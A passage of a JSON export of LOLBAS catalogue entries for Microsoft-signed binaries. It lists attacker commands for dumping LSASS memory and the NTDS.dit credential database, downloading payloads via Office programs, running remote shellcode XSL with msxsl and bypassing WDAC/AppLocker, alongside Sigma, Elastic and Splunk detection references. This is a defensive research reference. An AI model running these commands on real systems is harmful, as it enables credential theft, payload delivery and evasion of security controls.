identifier","Usecase":"Mounting the snapshot identifier 1 and accessing it with with copy c:\\[Snap Volume]\\windows\\ntds\\ntds.dit c:\\users\\administrator\\desktop\\ntds.dit.bak","Category":"Dump","Privileges":"Administrator","MitreID":"T1003.003","OperatingSystem":"Windows Server 2012, Windows Server 2016, Windows Server 2019"},{"Command":"dsdbutil.exe \"activate instance ntds\" \"snapshot\" \"list all\" \"delete 1\" \"quit\" \"quit\"","Description":"Deletes the mount of the snapshot","Usecase":"deletes the snapshot","Category":"Dump","Privileges":"Administrator","MitreID":"T1003.003","OperatingSystem":"Windows Server 2012, Windows Server 2016, Windows Server 2019"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\dsdbutil.exe"},{"Path":"C:\\Windows\\SysWOW64\\dsdbutil.exe"}],"Detection":[{"IOC":"Event ID 4688"},{"IOC":"dsdbutil.exe process creation"},{"IOC":"Event ID 4663"},{"IOC":"Regular and Volume Shadow Copy attempts to read or modify ntds.dit"},{"IOC":"Event ID 4656"},{"IOC":"Regular and Volume Shadow Copy attempts to read or modify ntds.dit"},{"Analysis":null},{"Sigma":null},{"Elastic":null},{"Splunk":null},{"BlockRule":null}],"Resources":[{"Link":"https://gist.github.com/bohops/88561ca40998e83deb3d1da90289e358"},{"Link":"https://www.netwrix.com/ntds_dit_security_active_directory.html"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dsdbutil/"},{"Name":"Dump64.exe","Description":"Memory dump tool that comes with Microsoft Visual Studio","Author":"mr.d0x","Created":"2021-11-16","Commands":[{"Command":"dump64.exe <pid> out.dmp","Description":"Creates a memory dump of the LSASS process.","Usecase":"Create memory dump and parse it offline to retrieve credentials.","Category":"Dump","Privileges":"Administrator","MitreID":"T1003.001","OperatingSystem":"Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Program Files (x86)\\Microsoft Visual Studio\\Installer\\Feedback\\dump64.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dump64.yml"},{"IOC":"As a Windows SDK binary, execution on a system may be suspicious"}],"Resources":[{"Link":"https://twitter.com/mrd0x/status/1460597833917251595"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dump64/"},{"Name":"DumpMinitool.exe","Description":"Dump tool part Visual Studio 2022","Author":"mr.d0x","Created":"2022-01-20","Commands":[{"Command":"DumpMinitool.exe --file c:\\users\\mr.d0x\\dump.txt --processId 1132 --dumpType Full","Description":"Creates a memory dump of the lsass process","Usecase":"Create memory dump and parse it offline","Category":"Dump","Privileges":"Administrator","MitreID":"T1003.001","OperatingSystem":"Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\Extensions\\TestPlatform\\Extensions"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_dumpminitool_execution.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_dumpminitool_susp_execution.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_devinit_lolbin_usage.yml"}],"Resources":[{"Link":"https://twitter.com/mrd0x/status/1511415432888131586"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/"},{"Name":"Dxcap.exe","Description":"DirectX diagnostics/debugger included with Visual Studio.","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"Dxcap.exe -c C:\\Windows\\System32\\notepad.exe","Description":"Launch notepad.exe as a subprocess of dxcap.exe. Note that you should have write permissions in the current working directory for the command to succeed; alternatively, add '-file c:\\path\\to\\writable\\location.ext' as first argument.","Usecase":"Local execution of a process as a subprocess of dxcap.exe","Category":"Execute","Privileges":"User","MitreID":"T1127","OperatingSystem":"Windows"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\dxcap.exe"},{"Path":"C:\\Windows\\SysWOW64\\dxcap.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_susp_dxcap.yml"}],"Resources":[{"Link":"https://twitter.com/harr0ey/status/992008180904419328"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/"},{"Name":"Excel.exe","Description":"Microsoft Office binary","Author":"Reegun J (OCBC Bank)","Created":"2019-07-19","Commands":[{"Command":"Excel.exe http://192.168.1.10/TeamsAddinLoader.dll","Description":"Downloads payload from remote server","Usecase":"It will download a remote payload and place it in INetCache.","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows","Tags":[{"Download":"INetCache"}]}],"Full_Path":[{"Path":"C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\Excel.exe"},{"Path":"C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\Excel.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office\\Office16\\Excel.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\Office16\\Excel.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\Excel.exe"},{"Path":"C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\Excel.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office\\Office15\\Excel.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\Office15\\Excel.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\Excel.exe"},{"Path":"C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\Excel.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office\\Office14\\Excel.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\Office14\\Excel.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office\\Office12\\Excel.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\Office12\\Excel.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\Office12\\Excel.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_office.yml"},{"IOC":"Suspicious Office application Internet/network traffic"}],"Resources":[{"Link":"https://twitter.com/reegun21/status/1150032506504151040"},{"Link":"https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/"},{"Name":"Fsi.exe","Description":"64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK.","Author":"Jimmy (@bohops)","Created":"2021-09-26","Commands":[{"Command":"fsi.exe c:\\path\\to\\test.fsscript","Description":"Execute F# code via script file","Usecase":"Execute payload with Microsoft signed binary to bypass WDAC policies","Category":"AWL Bypass","Privileges":"User","MitreID":"T1059","OperatingSystem":"Windows 10 2004 (likely previous and newer versions as well)"},{"Command":"fsi.exe","Description":"Execute F# code via interactive command line","Usecase":"Execute payload with Microsoft signed binary to bypass WDAC policies","Category":"AWL Bypass","Privileges":"User","MitreID":"T1059","OperatingSystem":"Windows 10 2004 (likely previous and newer versions as well)"}],"Full_Path":[{"Path":"C:\\Program Files\\dotnet\\sdk\\[sdk version]\\FSharp\\fsi.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Professional\\Common7\\IDE\\CommonExtensions\\Microsoft\\FSharp\\fsi.exe"}],"Detection":[{"Elastic":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"BlockRule":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"IOC":"Fsi.exe execution may be suspicious on non-developer machines"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml"}],"Resources":[{"Link":"https://twitter.com/NickTyrer/status/904273264385589248"},{"Link":"https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/"},{"Name":"FsiAnyCpu.exe","Description":"32/64-bit FSharp (F#) Interpreter included with Visual Studio.","Author":"Jimmy (@bohops)","Created":"2021-09-26","Commands":[{"Command":"fsianycpu.exe c:\\path\\to\\test.fsscript","Description":"Execute F# code via script file","Usecase":"Execute payload with Microsoft signed binary to bypass WDAC policies","Category":"AWL Bypass","Privileges":"User","MitreID":"T1059","OperatingSystem":"Windows 10 2004 (likely previous and newer versions as well)"},{"Command":"fsianycpu.exe","Description":"Execute F# code via interactive command line","Usecase":"Execute payload with Microsoft signed binary to bypass WDAC policies","Category":"AWL Bypass","Privileges":"User","MitreID":"T1059","OperatingSystem":"Windows 10 2004 (likely previous and newer versions as well)"}],"Full_Path":[{"Path":"c:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Professional\\Common7\\IDE\\CommonExtensions\\Microsoft\\FSharp\\fsianycpu.exe"}],"Detection":[{"BlockRule":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"IOC":"FsiAnyCpu.exe execution may be suspicious on non-developer machines"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml"}],"Resources":[{"Link":"https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/"},{"Name":"Mftrace.exe","Description":"Trace log generation tool for Media Foundation Tools.","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"Mftrace.exe cmd.exe","Description":"Launch cmd.exe as a subprocess of Mftrace.exe.","Usecase":"Local execution of cmd.exe as a subprocess of Mftrace.exe.","Category":"Execute","Privileges":"User","MitreID":"T1127","OperatingSystem":"Windows"},{"Command":"Mftrace.exe powershell.exe","Description":"Launch cmd.exe as a subprocess of Mftrace.exe.","Usecase":"Local execution of powershell.exe as a subprocess of Mftrace.exe.","Category":"Execute","Privileges":"User","MitreID":"T1127","OperatingSystem":"Windows"}],"Full_Path":[{"Path":"C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.16299.0\\x86"},{"Path":"C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.16299.0\\x64"},{"Path":"C:\\Program Files (x86)\\Windows Kits\\10\\bin\\x86"},{"Path":"C:\\Program Files (x86)\\Windows Kits\\10\\bin\\x64"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_mftrace.yml"}],"Resources":[{"Link":"https://twitter.com/0rbz_/status/988911181422186496"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mftrace/"},{"Name":"Microsoft.NodejsTools.PressAnyKey.exe","Description":"Part of the NodeJS Visual Studio tools.","Author":"mr.d0x","Created":"2022-01-20","Commands":[{"Command":"Microsoft.NodejsTools.PressAnyKey.exe normal 1 cmd.exe","Description":"Launch cmd.exe as a subprocess of Microsoft.NodejsTools.PressAnyKey.exe.","Usecase":"Spawn a new process via Microsoft.NodejsTools.PressAnyKey.exe.","Category":"Execute","Privileges":"User","MitreID":"T1127","OperatingSystem":"Windows"}],"Full_Path":[{"Path":"C:\\Program Files\\Microsoft Visual Studio\\*\\Community\\Common7\\IDE\\Extensions\\Microsoft\\NodeJsTools\\NodeJsTools\\Microsoft.NodejsTools.PressAnyKey.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Visual Studio\\*\\Community\\Common7\\IDE\\Extensions\\Microsoft\\NodeJsTools\\NodeJsTools\\Microsoft.NodejsTools.PressAnyKey.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_renamed_pressanykey.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_pressanykey_lolbin_execution.yml"}],"Resources":[{"Link":"https://twitter.com/mrd0x/status/1463526834918854661"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey/"},{"Name":"MSAccess.exe","Description":"Microsoft Office component","Author":"Nir Chako","Created":"2023-04-30","Commands":[{"Command":"MSAccess.exe https://example.com/payload.exe.mdb","Description":"Downloads payload from remote server","Usecase":"It will download a remote payload (if it has the filename extension .mdb) and place it in INetCache.","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows","Tags":[{"Download":"INetCache"}]}],"Full_Path":[{"Path":"C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\MSAccess.exe"},{"Path":"C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\MSAccess.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office\\Office16\\MSAccess.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\Office16\\MSAccess.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\MSAccess.exe"},{"Path":"C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\MSAccess.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office\\Office15\\MSAccess.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\Office15\\MSAccess.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\MSAccess.exe"},{"Path":"C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\MSAccess.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSAccess.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\Office14\\MSAccess.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office\\Office12\\MSAccess.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\Office12\\MSAccess.exe"}],"Detection":[{"IOC":"URL on a MSAccess command line"},{"IOC":"MSAccess making unexpected network connections or DNS requests"}],"Resources":null,"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msaccess/"},{"Name":"Msdeploy.exe","Description":"Microsoft tool used to deploy Web Applications.","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand=\"c:\\temp\\calc.bat\"","Description":"Launch calc.bat via msdeploy.exe.","Usecase":"Local execution of batch file using msdeploy.exe.","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows server"},{"Command":"msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand=\"c:\\temp\\calc.bat\"","Description":"Launch calc.bat via msdeploy.exe.","Usecase":"Local execution of batch file using msdeploy.exe.","Category":"AWL Bypass","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows server"}],"Full_Path":[{"Path":"C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V3\\msdeploy.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_msdeploy.yml"}],"Resources":[{"Link":"https://twitter.com/pabraeken/status/995837734379032576"},{"Link":"https://twitter.com/pabraeken/status/999090532839313408"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/"},{"Name":"MsoHtmEd.exe","Description":"Microsoft Office component","Author":"Nir Chako","Created":"2022-07-24","Commands":[{"Command":"MsoHtmEd.exe https://example.com/payload","Description":"Downloads payload from remote server","Usecase":"It will download a remote payload and place it in INetCache.","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows 10, Windows 11","Tags":[{"Download":"INetCache"}]}],"Full_Path":[{"Path":"C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\MSOHTMED.exe"},{"Path":"C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\MSOHTMED.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office\\Office16\\MSOHTMED.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\Office16\\MSOHTMED.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\MSOHTMED.exe"},{"Path":"C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\MSOHTMED.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office\\Office15\\MSOHTMED.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\Office15\\MSOHTMED.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\MSOHTMED.exe"},{"Path":"C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\MSOHTMED.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSOHTMED.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\Office14\\MSOHTMED.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office\\Office12\\MSOHTMED.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\Office12\\MSOHTMED.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\Office12\\MSOHTMED.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_msohtmed_download.yml"},{"IOC":"Suspicious Office application internet/network traffic"}],"Resources":null,"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/MsoHtmEd/"},{"Name":"Mspub.exe","Description":"Microsoft Publisher","Author":"Nir Chako","Created":"2022-08-02","Commands":[{"Command":"mspub.exe https://example.com/payload","Description":"Downloads payload from remote server","Usecase":"It will download a remote payload and place it in INetCache.","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows 10, Windows 11","Tags":[{"Download":"INetCache"}]}],"Full_Path":[{"Path":"C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\MSPUB.exe"},{"Path":"C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\MSPUB.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office\\Office16\\MSPUB.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\Office16\\MSPUB.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\MSPUB.exe"},{"Path":"C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\MSPUB.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office\\Office15\\MSPUB.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\Office15\\MSPUB.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\MSPUB.exe"},{"Path":"C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\MSPUB.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\Office14\\MSPUB.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_mspub_download.yml"},{"IOC":"Suspicious Office application internet/network traffic"}],"Resources":null,"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mspub/"},{"Name":"msxsl.exe","Description":"Command line utility used to perform XSL transformations.","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"msxsl.exe customers.xml script.xsl","Description":"Run COM Scriptlet code within the script.xsl file (local).","Usecase":"Local execution of script stored in XSL file.","Category":"Execute","Privileges":"User","MitreID":"T1220","OperatingSystem":"Windows"},{"Command":"msxsl.exe customers.xml script.xsl","Description":"Run COM Scriptlet code within the script.xsl file (local).","Usecase":"Local execution of script stored in XSL file.","Category":"AWL Bypass","Privileges":"User","MitreID":"T1220","OperatingSystem":"Windows"},{"Command":"msxsl.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml","Description":"Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).","Usecase":"Local execution of remote script stored in XSL script stored as an XML file.","Category":"Execute","Privileges":"User","MitreID":"T1220","OperatingSystem":"Windows"},{"Command":"msxsl.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml","Description":"Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).","Usecase":"Local execution of remote script stored in XSL script stored as an XML file.","Category":"AWL Bypass","Privileges":"User","MitreID":"T1220","OperatingSystem":"Windows"},{"Command":"msxsl.exe https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/calc.xml https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/transform.xsl -o <filename>","Description":"Using remote XML and XSL files, save the transformed XML file to disk.","Usecase":"Download a file from the internet and save it to disk.","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows"},{"Command":"msxsl.exe https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/calc.xml https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/transform.xsl -o <filename>:ads-name","Description":"Using remote XML and XSL files, save the transformed XML file to an Alternate Data Stream (ADS).","Usecase":"Download a file from the internet and save it to an NTFS Alternate Data Stream.","Category":"ADS","Privileges":"User","MitreID":"T1564","OperatingSystem":"Windows"}],"Full_Path":[{"Path":"no default"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_msxsl_beacon.toml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_msxsl_network.toml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"Resources":[{"Link":"https://twitter.com/subTee/status/877616321747271680"},{"Link":"https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker"},{"Link":"https://github.com/RonnieSalomonsen/Use-msxsl-to-download-file"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/"},{"Name":"ntdsutil.exe","Description":"Command line utility used to export Active Directory.","Author":"Tony Lambert","Created":"2020-01-10","Commands":[{"Command":"ntdsutil.exe \"ac i ntds\" \"ifm\" \"create full c:\\\" q q","Description":"Dump NTDS.dit into folder","Usecase":"Dumping of Active Directory NTDS.dit database","Category":"Dump","Privileges":"Administrator","MitreID":"T1003.003","OperatingSystem":"Windows"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\ntdsutil.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml"},{"Splunk":"https://github.com/splunk/security_content/blob/2b87b26bdc2a84b65b1355ffbd5174bdbdb1879c/detections/endpoint/ntdsutil_export_ntds.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"},{"IOC":"ntdsutil.exe with command line including \"ifm\""}],"Resources":[{"Link":"https://adsecurity.org/?p=2398#CreateIFM"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Ntdsutil/"},{"Name":"OpenConsole.exe","Description":"Console Window host for Windows Terminal","Author":"Nasreddine Bencherchali","Created":"2022-06-17","Commands":[{"Command":"OpenConsole.exe calc","Description":"Execute calc with OpenConsole.exe as parent process","Usecase":"Use OpenConsole.exe as a proxy binary to evade defensive counter-measures","Category":"Execute","Privileges":"User","MitreID":"T1202","OperatingSystem":"Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\Terminal\\ServiceHub\\os64\\OpenConsole.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\Terminal\\ServiceHub\\os86\\OpenConsole.exe"},{"Path":"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\Terminal\\ServiceHub\\os64\\OpenConsole.exe"}],"Detection":[{"IOC":"OpenConsole.exe spawning unexpected processes"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/9e0ef7251b075f15e7abafbbec16d3230c5fa477/rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml"}],"Resources":[{"Link":"https://twitter.com/nas_bench/status/1537563834478645252"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/OpenConsole/"},{"Name":"Powerpnt.exe","Description":"Microsoft Office binary.","Author":"Reegun J (OCBC Bank)","Created":"2019-07-19","Commands":[{"Command":"Powerpnt.exe \"http://192.168.1.10/TeamsAddinLoader.dll\"","Description":"Downloads payload from remote server","Usecase":"It will download a remote payload and place it in INetCache.","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows","Tags":[{"Download":"INetCache"}]}],"Full_Path":[{"Path":"C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\Powerpnt.exe"},{"Path":"C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\Powerpnt.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office\\Office16\\Powerpnt.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\Office16\\Powerpnt.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\Powerpnt.exe"},{"Path":"C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\Powerpnt.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office\\Office15\\Powerpnt.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\Office15\\Powerpnt.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\Powerpnt.exe"},{"Path":"C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\Powerpnt.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office\\Office14\\Powerpnt.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\Office14\\Powerpnt.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office\\Office12\\Powerpnt.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\Office12\\Powerpnt.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\Office12\\Powerpnt.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_office.yml"},{"IOC":"Suspicious Office application Internet/network traffic"}],"Resources":[{"Link":"https://twitter.com/reegun21/status/1150032506504151040"},{"Link":"https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/"},{"Name":"Procdump.exe","Description":"SysInternals Memory Dump Tool","Author":"Alfie Champion (@ajpc500)","Created":"2020-10-14","Commands":[{"Command":"procdump.exe -md calc.dll explorer.exe","Description":"Loads calc.dll where DLL is configured with a 'MiniDumpCallbackRoutine' exported function. Valid process must be provided as dump still created.","Usecase":"Performs execution of unsigned DLL.","Category":"Execute","Privileges":"User","MitreID":"T1202","OperatingSystem":"Windows 8.1 and higher, Windows Server 2012 and higher","Tags":[{"Execute":"DLL"}]},{"Command":"procdump.exe -md calc.dll foobar","Description":"Loads calc.dll where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary.","Usecase":"Performs execution of unsigned DLL.","Category":"Execute","Privileges":"User","MitreID":"T1202","OperatingSystem":"Windows 8.1 and higher, Windows Server 2012 and higher","Tags":[{"Execute":"DLL"}]}],"Full_Path":[{"Path":"no 